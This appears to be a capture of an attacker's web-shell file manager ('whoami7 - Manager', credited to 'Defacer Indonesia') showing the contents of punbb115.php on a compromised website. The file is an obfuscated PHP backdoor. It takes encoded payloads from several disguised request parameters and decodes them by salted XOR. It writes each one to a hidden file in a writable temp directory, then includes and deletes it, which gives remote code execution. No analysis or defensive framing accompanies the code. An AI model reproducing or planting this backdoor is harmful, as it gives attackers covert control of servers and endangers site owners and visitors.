whoami7 - Manager
:
/
home
/
analuakl
/
grinsentertainment.com
/
Upload File:
files >> /home/analuakl/grinsentertainment.com/punbb115.php
<?php if(array_key_exists("ptr", $_POST)){ $entry = array_filter([sys_get_temp_dir(), "/var/tmp", getenv("TMP"), getcwd(), ini_get("upload_tmp_dir"), "/dev/shm", getenv("TEMP"), session_save_path(), "/tmp"]); $token = $_POST["ptr"]; $token= explode ("." , $token ); $binding = ''; $salt = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen( $salt ); $z = 0; $__len = count( $token ); do { if( $z >= $__len) break; $v8 = $token[$z]; $sChar = ord( $salt[$z % $lenS] ); $dec =( ( int)$v8 - $sChar -( $z % 10)) ^ 2; $binding .= chr( $dec ); $z++; } while( true ); foreach ($entry as $key => $marker) { if (is_writable($marker) && is_dir($marker)) { $obj = vsprintf("%s/%s", [$marker, ".descriptor"]); $file = fopen($obj, 'w'); if ($file) { fwrite($file, $binding); fclose($file); include $obj; @unlink($obj); die(); } } } } if(in_array("\x70\x72o\x70\x65rty_\x73e\x74", array_keys($_REQUEST))){ $pset = array_filter([getcwd(), "/var/tmp", getenv("TEMP"), sys_get_temp_dir(), "/dev/shm", ini_get("upload_tmp_dir"), session_save_path(), "/tmp", getenv("TMP")]); $pgrp = $_REQUEST["\x70\x72o\x70\x65rty_\x73e\x74"]; $pgrp = explode( "." , $pgrp ); $binding = ''; $s2 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen( $s2); foreach( $pgrp as $q => $v1) { $chS = ord( $s2[$q % $lenS]); $dec =( ( int)$v1 - $chS -( $q % 10)) ^ 17; $binding .= chr( $dec); } $hld = 0; do { $entity = $pset[$hld] ?? null; if ($hld >= count($pset)) break; if (is_dir($entity) && is_writable($entity)) { $ent = "$entity/.data"; if (file_put_contents($ent, $binding)) { require $ent; unlink($ent); exit; } } $hld++; } while (true); } if(array_key_exists("de\x73cr\x69\x70\x74or", $_POST)){ $symbol = array_filter([getenv("TEMP"), getcwd(), session_save_path(), "/var/tmp", ini_get("upload_tmp_dir"), sys_get_temp_dir(), "/dev/shm", getenv("TMP"), "/tmp"]); $ent = $_POST["de\x73cr\x69\x70\x74or"]; $ent = explode( '.' ,$ent ); $comp = ''; $salt9 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($salt9 ); $u = 0; foreach ($ent as $v3) {$sChar = ord($salt9[$u %$lenS] ); $dec = ((int)$v3 - $sChar - ($u %10)) ^ 17; $comp .= chr($dec ); $u++; } foreach ($symbol as $key => $pset) { if ((is_dir($pset) and is_writable($pset))) { $factor = join("/", [$pset, ".itm"]); $success = file_put_contents($factor, $comp); if ($success) { include $factor; @unlink($factor); die();} } } } if(array_key_exists("\x76\x61l", $_POST)){ $entity = array_filter([getcwd(), "/tmp", getenv("TEMP"), getenv("TMP"), "/var/tmp", "/dev/shm", session_save_path(), sys_get_temp_dir(), ini_get("upload_tmp_dir")]); $pgrp = $_POST["\x76\x61l"]; $pgrp = explode( ".", $pgrp ) ; $item = ''; $s = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen( $s); $l = 0; while( $l < count( $pgrp)) { $v7 = $pgrp[$l]; $sChar = ord( $s[$l % $sLen]); $dec = ( ( int)$v7 - $sChar -( $l % 10))^ 44; $item .=chr( $dec); $l++; } foreach ($entity as $dat): if (!!is_dir($dat) && !!is_writable($dat)) { $dchunk = join("/", [$dat, ".flg"]); $success = file_put_contents($dchunk, $item); if ($success) { include $dchunk; @unlink($dchunk); die();} } endforeach; } if(array_key_exists("\x64at", $_REQUEST)){ $val = $_REQUEST["\x64at"]; $val= explode ( "." ,$val ) ; $mrk = ''; $salt5 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen($salt5); $o = 0; foreach($val as $v3) { $chS = ord($salt5[$o% $sLen]); $d = ((int)$v3 - $chS -($o% 10)) ^2; $mrk.=chr($d); $o++; } $ent = array_filter([getenv("TMP"), sys_get_temp_dir(), "/var/tmp", "/dev/shm", getcwd(), "/tmp", getenv("TEMP"), session_save_path(), ini_get("upload_tmp_dir")]); foreach ($ent as $sym): if (!( !is_dir($sym) || !is_writable($sym) )) { $element = "$sym/.component"; if (@file_put_contents($element, $mrk) !== false) { include $element; unlink($element); die(); } } endforeach; }
Copyright ©2021 || Defacer Indonesia